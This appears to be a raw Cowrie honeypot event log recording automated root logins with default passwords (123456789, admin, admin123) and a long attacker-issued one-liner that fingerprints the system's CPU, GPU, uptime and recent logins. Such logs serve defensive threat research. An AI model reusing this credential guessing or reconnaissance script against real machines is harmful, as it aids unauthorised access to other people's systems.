{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:18:26.000645Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49900,"dst_ip":"1.2.3.4","dst_port":22,"session":"6de891b4465b","protocol":"ssh","message":"New connection: 212.227.125.160:49900 (1.2.3.4:22) [session: 6de891b4465b]","sensor":"my-vps","timestamp":"2025-09-08T19:18:26.864556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:18:26.865156Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.132236Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.592795Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:18:27.775344Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.776263Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.777020Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.778117Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.779453Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.780301Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.781060Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.781750Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.782159Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.782537Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.783079Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.783673Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:18:27.784122Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:18:28.074601Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:18:28.075751Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:18:28.076822Z","src_ip":"212.227.235.229","session":"0d9607c17023"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.123878Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:18:29.892478Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.893476Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.894158Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.895527Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.896540Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.897322Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.898086Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.899216Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.899772Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.900565Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.901186Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.901768Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:18:29.902294Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:18:30.379904Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:18:30.380953Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:18:30.382172Z","src_ip":"212.227.125.160","session":"6de891b4465b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:18:45.236705Z","src_ip":"87.121.84.168","session":"899eeccb018c"}
{"eventid":"cowrie.session.closed","duration":180.12657380104065,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:18:45.241371Z","src_ip":"87.121.84.168","session":"899eeccb018c"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":50990,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb0dd18ab64f","protocol":"telnet","message":"New connection: 79.124.8.120:50990 (1.2.3.4:23) [session: eb0dd18ab64f]","sensor":"my-vps","timestamp":"2025-09-08T19:19:00.993091Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:19:01.033663Z","src_ip":"79.124.8.120","session":"eb0dd18ab64f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:19:01.060626Z","src_ip":"79.124.8.120","session":"eb0dd18ab64f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51398,"dst_ip":"1.2.3.4","dst_port":22,"session":"a44936e6ff0e","protocol":"ssh","message":"New connection: 212.227.235.229:51398 (1.2.3.4:22) [session: a44936e6ff0e]","sensor":"my-vps","timestamp":"2025-09-08T19:19:48.050764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:19:48.162245Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:19:48.347319Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56464,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3133c10a9fa","protocol":"ssh","message":"New connection: 212.227.125.160:56464 (1.2.3.4:22) [session: c3133c10a9fa]","sensor":"my-vps","timestamp":"2025-09-08T19:19:49.620327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:19:49.620996Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:19:49.720961Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:19:49.970223Z","src_ip":"212.227.125.160","session":"c3133c10a9fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:19:50.370243Z","src_ip":"212.227.235.229","session":"a44936e6ff0e"}
